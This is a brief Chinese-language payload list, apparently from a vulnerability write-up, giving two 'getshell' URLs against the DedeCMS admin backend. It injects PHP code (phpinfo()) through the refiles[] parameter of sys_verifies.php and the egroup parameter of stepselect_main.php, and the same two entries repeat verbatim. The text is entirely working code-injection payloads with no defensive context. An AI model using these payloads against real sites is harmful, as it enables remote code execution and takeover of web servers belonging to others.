一、payload如下:
第一处getshell :
http://localhost/dede/sys_verifies.php?action=getfiles&refiles[]=\";phpinfo();//
第二处getshell :
http://localhost/dede/stepselect_main.php?action=addenum_save&ename=233&issign=1&egroup=;phpinfo();$
第一处getshell :
http://localhost/dede/sys_verifies.php?action=getfiles&refiles[]=\";phpinfo();//
第二处getshell :
http://localhost/dede/stepselect_main.php?action=addenum_save&ename=233&issign=1&egroup=;phpinfo();$